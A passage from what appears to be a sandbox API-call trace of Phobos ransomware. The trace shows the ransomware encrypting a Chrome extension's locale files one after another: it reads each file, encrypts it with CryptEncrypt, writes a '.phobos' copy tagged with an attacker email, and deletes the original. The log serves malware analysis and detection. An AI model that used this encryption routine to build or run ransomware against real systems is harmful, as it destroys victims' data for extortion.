(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js")) returned 1 [0163.079] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0163.079] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0163.079] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16425) returned 1 [0163.079] CloseHandle (hObject=0x138) returned 1 [0163.079] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json")) returned 0x2020 [0163.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0163.080] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0163.080] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0163.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0163.080] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0163.080] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0163.080] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4029, lpOverlapped=0x0) returned 1 [0163.305] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4030, dwBufLen=0x4030 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4030) returned 1 [0163.305] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4030, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4030, lpOverlapped=0x0) returned 1 [0163.306] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0163.306] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0163.306] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0163.306] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0163.307] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0163.307] CryptDestroyKey (hKey=0xa327e8) returned 1 [0163.307] CloseHandle (hObject=0x138) returned 1 [0163.307] CloseHandle (hObject=0x194) returned 1 [0163.307] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json")) returned 1 [0163.308] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0163.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0163.308] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16495) returned 1 [0163.308] CloseHandle (hObject=0x194) returned 1 [0163.308] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json")) returned 0x2020 [0163.308] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0163.308] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0163.309] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0163.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0163.309] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0163.309] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0163.309] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x406f, lpOverlapped=0x0) returned 1 [0163.532] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4070, dwBufLen=0x4070 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4070) returned 1 [0163.532] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4070, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4070, lpOverlapped=0x0) returned 1 [0163.533] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0163.533] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0163.533] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0163.533] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0163.533] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0163.534] CryptDestroyKey (hKey=0xa327e8) returned 1 [0163.534] CloseHandle (hObject=0x194) returned 1 [0163.534] CloseHandle (hObject=0x138) returned 1 [0163.534] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json")) returned 1 [0163.535] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0163.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0163.535] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=15738) returned 1 [0163.535] CloseHandle (hObject=0x138) returned 1 [0163.535] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json")) returned 0x2020 [0163.535] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0163.535] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0163.535] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0163.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0163.536] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0163.536] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0163.536] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3d7a, lpOverlapped=0x0) returned 1 [0163.792] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3d80, dwBufLen=0x3d80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3d80) returned 1 [0163.792] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3d80, lpOverlapped=0x0) returned 1 [0163.793] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0163.793] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0163.793] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0163.793] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.793] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0163.793] CryptDestroyKey (hKey=0xa327e8) returned 1 [0163.793] CloseHandle (hObject=0x138) returned 1 [0163.793] CloseHandle (hObject=0x194) returned 1 [0163.793] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json")) returned 1 [0163.794] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0163.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0163.795] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16459) returned 1 [0163.795] CloseHandle (hObject=0x194) returned 1 [0163.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json")) returned 0x2020 [0163.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0163.795] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0163.795] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0163.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0163.796] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0163.796] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0163.796] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x404b, lpOverlapped=0x0) returned 1 [0163.964] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4050, dwBufLen=0x4050 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4050) returned 1 [0163.965] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4050, lpOverlapped=0x0) returned 1 [0163.966] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0163.966] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0163.966] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0163.966] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.966] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0163.966] CryptDestroyKey (hKey=0xa327e8) returned 1 [0163.966] CloseHandle (hObject=0x194) returned 1 [0163.966] CloseHandle (hObject=0x138) returned 1 [0163.966] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json")) returned 1 [0163.967] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0163.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0163.967] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16514) returned 1 [0163.968] CloseHandle (hObject=0x138) returned 1 [0163.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 